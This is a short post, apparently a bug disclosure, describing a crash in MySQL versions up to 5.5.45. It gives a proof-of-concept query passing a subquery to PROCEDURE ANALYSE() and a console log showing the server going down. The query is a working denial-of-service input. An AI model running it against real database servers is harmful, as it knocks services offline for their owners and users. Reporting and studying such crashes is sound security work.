This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.
Syntax:
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);
So an Example POC would be:
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
--------------------------------------------------------------------------------------------------------------- mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1); ERROR 2013 (HY000): Lost connection to MySQL server during query mysql> mysql> select 1; ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061) ERROR: Can't connect to the server mysql> ---------------------------------------------------------------------------------------------------------------
Advertisements
